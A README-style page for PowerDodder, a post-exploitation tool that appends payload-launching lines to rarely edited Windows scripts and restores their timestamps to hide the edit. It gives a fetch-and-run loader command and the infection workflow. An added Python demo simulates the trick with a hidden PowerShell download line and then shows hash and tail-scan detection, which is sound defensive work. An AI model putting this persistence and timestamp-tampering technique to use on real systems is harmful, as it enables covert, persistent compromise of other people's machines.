PowerDodder: The Stealthy New Tool That Hides Malware in Your Script Files

PowerDodder is a post-exploitation persistence utility designed to stealthily embed execution commands into existing script files on the host. By leveraging files that are frequently accessed but rarely modified, it targets high-likelihood execution vectors with minimal detection risk.

Background

Traditional persistence methods (e.g., Registry Run keys, scheduled tasks) are often monitored or flagged by EDRs and blue teams. PowerDodder takes a novel approach:

  • It hunts for existing script files on disk (.ps1, .bat, .cmd, .vbs, .js).
  • It prioritizes those that:
    • Have been accessed recently (a proxy for being executed often; note that NTFS last-access updates can be disabled on a host, in which case this timestamp is stale and the heuristic weakens).
    • Haven't been modified recently (suggesting they're not actively edited, so an appended line is unlikely to be noticed or overwritten).
  • It lets you choose the target script(s), then appends a payload-spawning command in the syntax appropriate to each script type (PowerShell, batch, VBScript, JScript, etc.).

This allows for low-noise persistence, hitching a ride on legitimate execution paths.

Name Origin

The name Dodder comes from a parasitic vine that attaches itself to host plants, slowly feeding off them without killing them — much like this tool latches onto host scripts for persistent execution.

Usage

1. Load the script

```powershell
iex (iwr https://raw.githubusercontent.com/itaymigdal/PowerDodder/refs/heads/main/PowerDodder.ps1)
```

2. Run a Hunt

Scans predefined folders (C:\Users\, C:\Program Files\, C:\Program Files (x86)\, C:\ProgramData\) for promising script files.

```powershell
DodderHunt
```

You can also target a specific folder:

```powershell
DodderHunt -FolderPath "C:\CustomPath"
```

Optional params:

-LastAccessTimeThreshold: a DateTime; files accessed more recently than it qualify. Default is 7 days ago.

-LastModifyTimeThreshold: a DateTime; files not modified since it qualify. Default is 3 months ago.

You can set different thresholds like this:

```powershell
$DifferentModifyThreshold = (get-date).AddMonths(-4)
$DifferentAccessThreshold = (get-date).AddDays(-20)
DodderHunt -LastAccessTimeThreshold $DifferentAccessThreshold -LastModifyTimeThreshold $DifferentModifyThreshold
```

3. Infect a script

```powershell
DodderInfect -ID <CandidateID> -PersistCommand <ExecutionCommand>
```

This will:

  • Build the line to append from the template that matches the script type.
  • Append that line to the target file.
  • Restore the file's original LastWriteTime so the modification is not visible in the timestamp.
  • Move the infected script from the candidates list to the Infected list.
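The following is an added example, not PowerDodder's code, that reproduces the mechanism described above on constructed files in a temporary directory: it applies the same "accessed recently, not modified recently" candidate heuristic from the Background section (with 3 months approximated as 90 days), appends a launcher line and restores the original mtime the way step 3 restores LastWriteTime, and then shows which defensive checks survive that trick. The launcher regex and the sample scripts are assumptions made for the demonstration.

```python
# Added example (not PowerDodder code): simulate appended-line persistence with
# timestamp restoration, then compare an mtime check, a content-hash baseline,
# and a trailing-line launcher scan.
import hashlib
import os
import re
import tempfile
import time
from pathlib import Path

SCRIPT_EXTS = {".ps1", ".bat", ".cmd", ".vbs", ".js"}
DAY = 86400

# Assumed indicators of an appended launcher line; not taken from the tool.
LAUNCHER_RE = re.compile(
    r"(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)\b"
    r".*?(-enc|-e\s|-w\s+hidden|-windowstyle|/c\b|\biex\b|downloadstring|createobject)"
)


def script_files(root: Path):
    return [p for p in root.rglob("*") if p.is_file() and p.suffix.lower() in SCRIPT_EXTS]


def hunt_candidates(root: Path, access_days: int = 7, modify_days: int = 90):
    """The heuristic the page attributes to DodderHunt (3 months ~ 90 days):
    accessed within access_days, not modified within modify_days. Defenders can
    use the same filter to decide which scripts deserve a content baseline."""
    now = time.time()
    hits = []
    for p in script_files(root):
        st = p.stat()
        if st.st_atime >= now - access_days * DAY and st.st_mtime <= now - modify_days * DAY:
            hits.append(p.name)
    return sorted(hits)


def baseline(root: Path) -> dict:
    """Record mtime (ns) and SHA-256 for every script file under root."""
    return {p.name: (p.stat().st_mtime_ns, hashlib.sha256(p.read_bytes()).hexdigest())
            for p in script_files(root)}


def dodder_style_append(p: Path, line: str) -> None:
    """Simulate the infection step: append a line, then put the original
    atime/mtime back so the write no longer shows in LastWriteTime."""
    st = p.stat()
    with p.open("a", newline="") as f:
        f.write("\n" + line + "\n")
    os.utime(p, ns=(st.st_atime_ns, st.st_mtime_ns))


def check_mtime(base: dict, root: Path):
    """Naive check: flag files whose mtime differs from the baseline."""
    return sorted(p.name for p in script_files(root) if p.stat().st_mtime_ns != base[p.name][0])


def check_hash(base: dict, root: Path):
    """Robust check: flag files whose content hash differs from the baseline."""
    return sorted(p.name for p in script_files(root)
                  if hashlib.sha256(p.read_bytes()).hexdigest() != base[p.name][1])


def check_tail(root: Path, n: int = 5):
    """Baseline-free check: flag files whose last n lines contain a launcher."""
    hits = []
    for p in script_files(root):
        tail = p.read_text(errors="replace").splitlines()[-n:]
        if any(LAUNCHER_RE.search(line) for line in tail):
            hits.append(p.name)
    return sorted(hits)


def demo() -> dict:
    with tempfile.TemporaryDirectory() as td:
        root = Path(td)
        # Constructed sample scripts: often run (fresh atime), rarely edited (old mtime).
        logon = root / "logon.bat"
        logon.write_text("@echo off\r\nnet use Z: \\\\fs\\share\r\n")
        backup = root / "backup.ps1"
        backup.write_text("Copy-Item C:\\data D:\\bak -Recurse\n")
        old = time.time() - 120 * DAY
        for p in (logon, backup):
            os.utime(p, (time.time(), old))

        candidates = hunt_candidates(root)
        base = baseline(root)
        # Constructed launcher line; example.invalid is a reserved, non-resolving name.
        dodder_style_append(backup, 'powershell -w hidden -c "iex (iwr http://example.invalid/p)"')

        return {
            "candidates": candidates,
            "mtime_hits": check_mtime(base, root),
            "hash_hits": check_hash(base, root),
            "tail_hits": check_tail(root),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Both constructed scripts are selected as candidates, the mtime check reports nothing after the infection, and both the hash baseline and the tail scan flag backup.ps1. On a real NTFS volume the timestamp restoration is also incomplete: SetFileTime can rewrite creation, last-access and last-write times, but not the MFT-entry-modified (ChangeTime) field in $STANDARD_INFORMATION, and the write still leaves a USN journal record, so a forensic timeline catches the edit even when LastWriteTime looks untouched.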

4. Helpers

  • DodderShow: Lists found candidates and already-infected files.
  • DodderClearCandidates: Empties the current candidates list (useful before rescanning).
